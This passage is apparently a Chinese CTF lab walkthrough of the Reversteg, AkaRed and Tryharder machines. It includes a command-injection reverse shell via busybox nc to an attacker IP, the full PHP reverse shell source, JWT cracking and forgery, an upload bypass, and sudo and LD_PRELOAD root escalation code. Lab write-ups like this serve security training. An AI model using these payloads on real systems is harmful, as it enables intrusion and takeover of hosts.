b2,g,msb,xy .. text: "UUUZs-VUU"
b2,b,lsb,xy .. text: "EUUUUUUUUV"
b2,b,msb,xy .. text: "_UUUoUUe"
b3,b,msb,xy .. file: MPEG ADTS, layer I, v2, 96 kbps, Stereo
b3,rgb,lsb,xy .. file: PGP Secret Sub-key -
b4,r,lsb,xy .. text: "DEUTfgww"
b4,r,msb,xy .. text: "M,\"\"\"\"\"\""
b4,g,lsb,xy .. text: ["\"" repeated 10 times]
b4,g,msb,xy .. text: "HDDDDDDDDDDH"
b4,b,lsb,xy .. text: "3\"##2\"\"#33333333333333334DDDDDDDDDD4C333\"\"\""
b4,b,msb,xy .. text: ",\"\"\"\"\"\"\"\"\"\","
得到的morainelake 应该是一个密码,下面要使用steghide这个工具来解密jpg图片,密码就是刚刚得到的,解出来一个压缩包
┌──(root㉿kali-plus)-[~/reversteg]
└─# steghide extract -sf 117db0148dc179a2c2245c5a30e63ab0.jpg
Enter passphrase:
wrote extracted data to "secret.zip".
user flag
压缩包有密码,使用刚刚得到的密码成功解密,得到secret.txt,里面是用户名和密码
┌──(root㉿kali-plus)-[~/reversteg/secret]
└─# cat secret.txt
morainelake:660930334
直接ssh连上去之后发现一个note.txt
morainelake@reversteg:~$ ls
history note.txt
morainelake@reversteg:~$ cat note.txt
morainelake is a very careless user with a very bad memory. He always throws things aside after organizing them. This time he accidentally lost the flag. Fortunately, the administrator has the historical records, but there are too many records to find the corresponding correct flag. Can you find it correctly?
"Don't worry about failures; worry about the chances you miss when you don't even try. After all, it's better to look back and say, 'I can't believe I did that,' than to look back and say, 'What if?' (You'll probably fail anyway.)"
在同一级目录下有一个history文件,cat发现是很多flag,再次cat发现2次的flag不一样,要找到真正的flag有以下几种方式
方法一
cat history > a
cat history > b
morainelake@reversteg:~$ grep -f a b
flag{fc8941b9088096e99b635cc3e07080d6}
方法二
morainelake@reversteg:~$ cat a b |awk 'a[$1]++'
flag{fc8941b9088096e99b635cc3e07080d6}
方法三
morainelake@reversteg:~$ cat a b |sort|uniq -c|sort -n
..............
1 flag{fbee74392020a83059df9151e7bf61c6}
1 flag{fd8ff11491b6a47a2b8c7a07d1f96515}
1 flag{fe983c9c1b8e74b063a58893e33386ba}
1 flag{febea309d0ee1d225ccc179bc709875e}
1 flag{ff0ae29007781f77bd2b85688c0219b0}
2 flag{fc8941b9088096e99b635cc3e07080d6}
提权-root flag
出现2次的就是真正的flag了,在/opt目录下有一个reverse,下载到本地使用ida分析一下
int __fastcall main(int argc, const char **argv, const char **envp)
{
char v4[28]; // [rsp+9h] [rbp-E7h] BYREF
__int128 v5; // [rsp+25h] [rbp-CBh] BYREF
char v6[7]; // [rsp+35h] [rbp-BBh] BYREF
int v7; // [rsp+3Ch] [rbp-B4h] BYREF
int v8; // [rsp+40h] [rbp-B0h] BYREF
int v9; // [rsp+60h] [rbp-90h] BYREF
int v10[8]; // [rsp+80h] [rbp-70h] BYREF
char dest[24]; // [rsp+A0h] [rbp-50h] BYREF
void *ptr; // [rsp+B8h] [rbp-38h]
int v13; // [rsp+C0h] [rbp-30h]
char v14; // [rsp+C7h] [rbp-29h]
char *v15; // [rsp+C8h] [rbp-28h]
char *v16; // [rsp+D0h] [rbp-20h]
void *v17; // [rsp+D8h] [rbp-18h]
void *v18; // [rsp+E0h] [rbp-10h]
char v19; // [rsp+EBh] [rbp-5h]
int v20; // [rsp+ECh] [rbp-4h]
puts("Enter passwords or Enter H coward mode:");
v20 = 0;
while ( 1 )
{
__isoc99_scanf("%s", &v4[7]);
if ( strcmp(&v4[7], "H") )
break;
if ( ++v20 == 100 )
{
puts("Hint: Invert XOR Replace! ");
goto LABEL_6;
}
}
strcpy(dest, &v4[7]);
__isoc99_scanf("%s %s %s", v10, &v9, &v8);
LABEL_6:
v7 = '},9';
strcpy(v6, "/, 8:(");
strcpy(&v5 + 7, "!!|}yx{z");
strcpy(&v5, "(;$)(#");
v19 = 'M';
v18 = xor_decrypt(&v5 + 7, 'M');
v17 = xor_decrypt(v6, v19);
v16 = xor_decrypt(&v7, v19);
v15 = xor_decrypt(&v5, v19);
if ( check_passwords(dest, v10, &v9, &v8, v18, v17, v16, v15) )
{
strcpy(v4, "pvygob");
v14 = 106;
v13 = 10;
ptr = caesar_decrypt(v4, 10LL);
printf("[+] Enter the password successfully! you know: %s\n", ptr);
free(ptr);
}
else
{
puts("[-] Incorrect password!");
}
free(v18);
free(v17);
free(v16);
free(v15);
return 0;
}
其中需要解密
},9 //ta0
8:( //bamuwe
!!|}yx{z //ll104567
(;$)(# //eviden
pvygob //flower
然后运行reverse依次输入ll104567bamuweta0eviden
morainelake@reversteg:/opt$ ./reverse
Enter passwords or Enter H coward mode:
ll104567
bamuwe
ta0
eviden
[+] Enter the password successfully! you know: flower
然后切换到welcome用户,密码是ll104567bamuweta0eviden
morainelake@reversteg:/opt$ su - welcome
Password:
$ bash
welcome@reversteg:~$ ls
welcome@reversteg:~$ pwd
/home/welcome
welcome@reversteg:~$ ls
welcome@reversteg:~$ sudo -l
Matching Defaults entries for welcome on reversteg:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on reversteg:
(ALL : ALL) NOPASSWD: /usr/bin/gcc -wrapper /opt/*
welcome@reversteg:~$ sudo /usr/bin/gcc -wrapper /bin/sh,-s .
[sudo] password for welcome:
Sorry, user welcome is not allowed to execute '/usr/bin/gcc -wrapper /bin/sh,-s .' as root on reversteg.
welcome@reversteg:~$ sudo /usr/bin/gcc -wrapper /opt/../../../bin/sh,-s .
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
# bash
root@reversteg:/home/welcome# cd ..
root@reversteg:/home# cd ..
root@reversteg:/# cd root
root@reversteg:~# ls
banner.txt history root.txt
root@reversteg:~# cat root.txt
flag{4f1eab505b71cd930b0eccd83ff0cfef}
这里用到一个../../../逃逸,然后直接提权
AkaRed
信息搜集
ip地址为192.168.1.105
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.1.105
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.1.105:22
Open 192.168.1.105:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-12 13:54 CST
Initiating ARP Ping Scan at 13:54
Scanning 192.168.1.105 [1 port]
Completed ARP Ping Scan at 13:54, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:54
Scanning lookup.hmv (192.168.1.105) [2 ports]
Discovered open port 80/tcp on 192.168.1.105
Discovered open port 22/tcp on 192.168.1.105
Completed SYN Stealth Scan at 13:54, 0.03s elapsed (2 total ports)
Nmap scan report for lookup.hmv (192.168.1.105)
Host is up, received arp-response (0.0010s latency).
Scanned at 2025-04-12 13:54:49 CST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:EB:F5:F2 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
user flag
扫出来22和80端口,80端口有一个命令执行,试了一下127.0.0.1;sleep 5可以正常执行,尝试去反弹一个shell过来,之前扫到目录robots.txt是一个base64编码,解密之后是welcome:akared
以为可以直接ssh连接但是试了好多密码都不对,只能回到命令执行了输入命令127.0.0.1 && busybox nc 192.168.1.104 4444 -e /bin/bash即可反弹shell,拿到shell之后去找一下user flag
┌──(root㉿kali-plus)-[~]
└─# nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.105 35044
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@AkaRed:/var/www/html$ ls
index.php robots.txt
www-data@AkaRed:/var/www/html$ cd ..
www-data@AkaRed:/var/www$ cd ..
www-data@AkaRed:/var$ cd ..
www-data@AkaRed:/$ ls
bin home lib32 media root sys vmlinuz
boot initrd.img lib64 mnt run tmp vmlinuz.old
dev initrd.img.old libx32 opt sbin usr
etc lib lost+found proc srv var
www-data@AkaRed:/$ cd home
www-data@AkaRed:/home$ ls
welcome
www-data@AkaRed:/home$ cd welcome
www-data@AkaRed:/home/welcome$ ls
user.txt
www-data@AkaRed:/home/welcome$ cat user.txt
flag{f0a41fdbc520e191db615c3335c6f305}
提权-root flag
直接使用sudo -l想要密码,但是我们不知道密码,先上传一个linpeas.sh进去看看,先找一个可以写入的目录find / -writable -type d 2>/dev/null
www-data@AkaRed:/home/welcome$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/dev/mqueue
/dev/shm
/var/lib/php/sessions
/var/tmp
/var/cache/apache2/mod_cache_disk
/run/lock
/run/lock/apache2
/tmp
/proc/5217/task/5217/fd
/proc/5217/fd
/proc/5217/map_files
发现/tmp目录是可以写入的,传一个linpeas上去跑一下,发现在/opt 文件夹下有一个showmepassword这个文件,他要求向指定文件输入1000行a,即可获得密码,使用seq 1 1000 | xargs -I {} echo "a" > xxoo命令
//命令详解
seq 1 1000 是生成从1到1000的数字序列每个数字占一行,后面的命令作用是:xargs 会将 seq 1 1000 的每一行输入(即 1 到 1000 的数字)替换到 {} 的位置,并执行 echo a 命令。由于 {} 被替换为输入的每一行,但实际上我们并不关心输入的内容,只是利用 xargs 来循环执行 echo a 最终得到的是1000行 a
www-data@AkaRed:/tmp$ seq 1 1000 | xargs -I {} echo "a" > xxoo
seq 1 1000 | xargs -I {} echo "a" > xxoo
www-data@AkaRed:/tmp$ wc -l xxoo
wc -l xxoo
1000 xxoo
www-data@AkaRed:/opt$ ./showmepassword
./showmepassword
input to /tmp/xxoo
when input 1000 count. u will get password.
d2VsY2
这样就拿到了密码,或者使用strings showmepassword命令也能找到密码或者使用ida进行反编译,拿到密码之后ssh连接上去找提权点
welcome@AkaRed:~$ sudo -l
Matching Defaults entries for welcome on AkaRed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on AkaRed:
(ALL : ALL) NOPASSWD: /usr/local/bin/stegseek
stegseek是一个图片隐写工具,可以把公钥写进图片里然后ssh连上去或者直接去把root.txt藏进flag里然后再提取出来
welcome@AkaRed:~$ cd /tmp
welcome@AkaRed:/tmp$ busybox wget http://192.168.1.104:9999/1.jpg
Connecting to 192.168.1.104:9999 (192.168.1.104:9999)
1.jpg 100% |*******************************************************************************************************************************************************************************************| 189k 0:00:00 ETA
welcome@AkaRed:/tmp$ sudo stegseek --embed -cf /tmp/1.jpg -ef /root/root.txt
Enter passphrase:
Re-Enter passphrase:
embedding "/root/root.txt" in "/tmp/1.jpg"... done
welcome@AkaRed:/tmp$ sudo stegseek --extract /tmp/1.jpg
Enter passphrase:
wrote extracted data to "root.txt".
welcome@AkaRed:/tmp$ ls
1.jpg root.txt systemd-private-9083634fc3114dc3a20156d7d4b69b13-apache2.service-J3gU2L systemd-private-9083634fc3114dc3a20156d7d4b69b13-systemd-timesyncd.service-zSK17d
welcome@AkaRed:/tmp$ cat root.txt
flag{0762f42f037bd7d4dd6486a95fd50943}
Tryharder
信息搜集
ip地址为192.168.1.102
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.1.102
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner. ____________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.1.102:22
Open 192.168.1.102:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-12 16:42 CST
Initiating ARP Ping Scan at 16:42
Scanning 192.168.1.102 [1 port]
Completed ARP Ping Scan at 16:42, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:42
Completed Parallel DNS resolution of 1 host. at 16:42, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:42
Scanning bogon (192.168.1.102) [2 ports]
Discovered open port 80/tcp on 192.168.1.102
Discovered open port 22/tcp on 192.168.1.102
Completed SYN Stealth Scan at 16:42, 0.06s elapsed (2 total ports)
Nmap scan report for bogon (192.168.1.102)
Host is up, received arp-response (0.00092s latency).
Scanned at 2025-04-12 16:42:26 CST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:26:8E:04 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
扫到80和22,80端口是一个 西溪湖科技 的页面但是所有的页面和按钮都没什么用,看源码发现一个base64编码/* 调试信息:API路径 /NzQyMjE= */ 解密得到74221 访问之后得到一个登录界面
user flag
测试出tset/123456弱密码,进去之后是文件上传功能但是当前用户不是admin,抓包得到jwt_token,那就是要伪造jwt了,先使用john爆破密码
┌──(root㉿kali-plus)-[~]
└─# john tmp --wordlist=/usr/share/seclists/Passwords/scraped-JWT-secrets.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jwtsecret123 (?)
1g 0:00:00:00 DONE (2025-04-12 17:21) 20.00g/s 2077Kp/s 2077Kc/s 2077KC/s vhtpc4600..!@2222222fasdhiohDCWQA
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到密码 jwtsecret123 可以直接使用jwt_tool或者jwt.io去修改jwt
┌──(root㉿kali-plus)-[~/jwt_tool]
└─# python3 jwt_tool.py -T -S hs256 -p jwtsecret123 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjMiLCJyb2xlIjoidXNlciIsImV4cCI6MTc0NDQ1Mjc1OX0.VzOxTpkrkMqux_pHC-lKz4FMNLDqwpjRQEGUmAKWWEs
Original JWT:
====================================================================
This option allows you to tamper with the header, contents and
signature of the JWT.
====================================================================
Token header values:
[1] alg = "HS256"
[2] typ = "JWT"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
Token payload values:
[1] sub = "123"
[2] role = "user"
[3] exp = 1744452759 ==> TIMESTAMP = 2025-04-12 18:12:39 (UTC)
[4] *ADD A VALUE*
[5] *DELETE A VALUE* [6] *UPDATE TIMESTAMPS*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 2
Current value of role is: user
Please enter new value and hit ENTER
> admin
[1] sub = "123"
[2] role = "admin"
[3] exp = 1744452759 ==> TIMESTAMP = 2025-04-12 18:12:39 (UTC)
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[6] *UPDATE TIMESTAMPS*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
jwttool_2934c15a36deb81263bf9d334baad904 - Tampered token - HMAC Signing:
[+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjMiLCJyb2xlIjoiYWRtaW4iLCJleHAiOjE3NDQ0NTI3NTl9.xE4F-HTbP3s2FgaNs71EfZq1a2jB00XgqeBLjrUrtOU
得到伪造好的jwt直接利用,使用hackbar修改一下jwt就能看到有一个文件上传的按钮,点击之后就跳转到文件上传的界面了,但是只能上传jpg和png,那就使用.htaccess把所有文件都解析为php文件
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
把ip和端口号改了就行,然后访问这个文件就能反弹shell了,拿到shell进/home/pentester目录拿user flag
www-data@Tryharder:/home/pentester$ ls -al
ls -al
total 28
drwxr-xr-x 2 pentester pentester 4096 Mar 25 06:46 .
drwxr-xr-x 4 root root 4096 Mar 23 10:46 ..
lrwxrwxrwx 1 root root 9 Mar 22 08:03 .bash_history -> /dev/null
-rw-r--r-- 1 pentester pentester 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 pentester pentester 3526 Apr 18 2019 .bashrc
-rw-r--r-- 1 root root 58 Mar 25 02:13 .note
-rw-r--r-- 1 pentester pentester 807 Apr 18 2019 .profile
-rw-r--r-- 1 pentester pentester 47 Mar 23 07:08 user.txt
www-data@Tryharder:/home/pentester$ cat user.txt
cat user.txt
Flag{c4f9375f9834b4e7f0a528cc65c055702bf5f24a}
提权-root flag
同目录下有一个.note文件
www-data@Tryharder:/home/pentester$ cat .note
cat .note
Two cities clashed in tale: Smash Caesar, buddy, to pass.
www-data@Tryharder:/home/pentester$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
pentester:x:1000:1000:Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight...:/home/pentester:/bin/bash
xiix:x:1001:1001:A Tale of Two Cities:/home/xiix:/bin/bash
看到/etc/passwd有一个特别长的用户介绍Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight...接着去找一下隐藏文件find / -name '.*' 2>/dev/null |grep -Pv 'sys|proc'
www-data@Tryharder:/$ find / -name '.*' 2>/dev/null |grep -Pv 'sys|proc' find / -name '.*' 2>/dev/null |grep -Pv 'sys|proc'
/srv/...
/var/www/html/74221/uploads/123/.htaccess
/var/backups/.secret
/var/backups/.secret/.verysecret
/var/backups/.secret/.verysecret/.noooooo
/home/pentester/.profile /home/pentester/.bashrc
/home/pentester/.bash_logout
/home/pentester/.note
/home/pentester/.bash_history
/home/xiix/.local
/home/xiix/.profile
/home/xiix/.bashrc
/home/xiix/.bash_logout
/home/xiix/.bash_history
/run/network/.ifstate.lock
/usr/src/linux-headers-4.19.0-27-amd64/.config
/usr/src/linux-headers-4.19.0-27-amd64/.kernelvariables /etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.d/.placeholder
/etc/cron.weekly/.placeholder
/etc/cron.monthly/.placeholder
/etc/skel/.profile /etc/skel/.bashrc
/etc/skel/.bash_logout /etc/.pwd.lock
看到有一个/srv/...可疑文件
www-data@Tryharder:/$ cat /srv/... cat /srv/... Iuwbtthfbetuoftimfs"iuwbsuhfxpsttoguinet@jtwbttieahfogwiseon#iuxatthfageofgpoljthoess%itwbsuiffqocipfbemieg-iuxbsuhffqpdhogjocredvljtz,'iuwasuhesfasooofLjgiu../
发现这2个看起来很想但是又不全一样,看了下wp,发现是将这个2个进行对比,得到0和1然后再去解密,使用paste这个工具进行对比
cat a|sed 's/./&\n/g' > aa
cat b|sed 's/./&\n/g' > bb
paste aa bb
┌──(root㉿kali-plus)-[~]
└─# paste aa bb|awk '{if($1==$2){printf 0}else{printf 1}}' 01011001001100000101010101011111001101010100110100110100010100110100100000110011010001000101111100110001001101110101111100111000010101010100010001000100010110010
解密得到Y0U_5M4SH3D_17_8UDDY
www-data@Tryharder:/$ su - pentester
su - pentester
Password: Y0U_5M4SH3D_17_8UDDY
pentester@Tryharder:~$ id id uid=1000(pentester) gid=1000(pentester) groups=1000(pentester)
pentester@Tryharder:~$ sudo -l sudo -l Matching Defaults entries for pentester on tryharder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User pentester may run the following commands on tryharder: (ALL : ALL) NOPASSWD: /usr/bin/find
pentester@Tryharder:~$ sudo /usr/bin/find . -exec /bin/sh \; -quit
sudo /usr/bin/find . -exec /bin/sh \; -quit
find: critical error - Segmentation fault (core dumped) pentester@Tryharder:~$ find . -exec /bin/sh \; -quit
find . -exec /bin/sh \; -quit
find: critical error - Segmentation fault (core dumped)
使用命令进行提权但是出错了不知道为什么,找一下用户find / -name xiix 2>/dev/null找到一个/srv/backdoor.py文件,但是没有查看的权限,看了一眼端口情况发现有一个8989端口,nc连接上去看看,发现需要密码,但是只知道一个密码就是刚刚解密得到的,连上去是xiix用户,但是只能访问当前目录的内容,那就只能写个公钥进去了,连上去之后我们还是没有密码,只有一个guess_game文件,就是一个猜数字的文件,0-99,可以选择直接爆破for i in $(seq 100);do echo 98| ./guess_game ;done
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单: 我心里有个数字(0-99),你有一次机会猜。
I have a number (0-99), you get one guess. 猜对了,我就把属于你的东西给你;猜错了?嘿嘿,后果自负! Guess right, I’ll give your reward; wrong? Hehe, face the consequences! 提示: 聪明人也许能找到捷径。 Hint: Smart ones might find a shortcut. 天哪!你居然猜对了!运气逆天啊!
/ You got it! Amazing luck!
Pass: superxiix
试了好多次终于对了,得到密码superxiix
xiix@Tryharder:~$ sudo -l
[sudo] password for xiix:
Matching Defaults entries for xiix on tryharder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD User xiix may run the following commands on tryharder: (ALL : ALL) /bin/whoami
看到有LD_PRELOAD,直接hacktricks-LD_PRELOAD搜就行,解决方案是写一个pe.c
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
然后 gcc -fPIC -shared -o pe.so pe.c -nostartfiles 报错不用管,然后输入sudo LD_PRELOAD=./pe.so /bin/whoami
xiix@Tryharder:~$ vi pe.c
xiix@Tryharder:~$ gcc -fPIC -shared -o pe.so pe.c -nostartfiles
pe.c: In function ‘_init’: pe.c:7:5: warning: implicit declaration of function ‘setgid’; did you mean ‘setenv’? [-Wimplicit-function-declaration] setgid(0); ^~~~~~ setenv pe.c:8:5: warning: implicit declaration of function ‘setuid’; did you mean ‘setenv’? [-Wimplicit-function-declaration] setuid(0); ^~~~~~ setenv
xiix@Tryharder:~$ sudo LD_PRELOAD=./pe.so /bin/whoami
[sudo] password for xiix:
root@Tryharder:/home/xiix# id uid=0(root) gid=0(root) groups=0(root) root@Tryharder:/home/xiix# ls guess_game pe.c pe.so root@Tryharder:/home/xiix# cd /root
root@Tryharder:~# ls
1.c congrats.txt root.txt
root@Tryharder:~# cat root.txt
Flag{7ca62df5c884cd9a5e5e9602fe01b39f9ebd8c6f}
TheWall
信息搜集
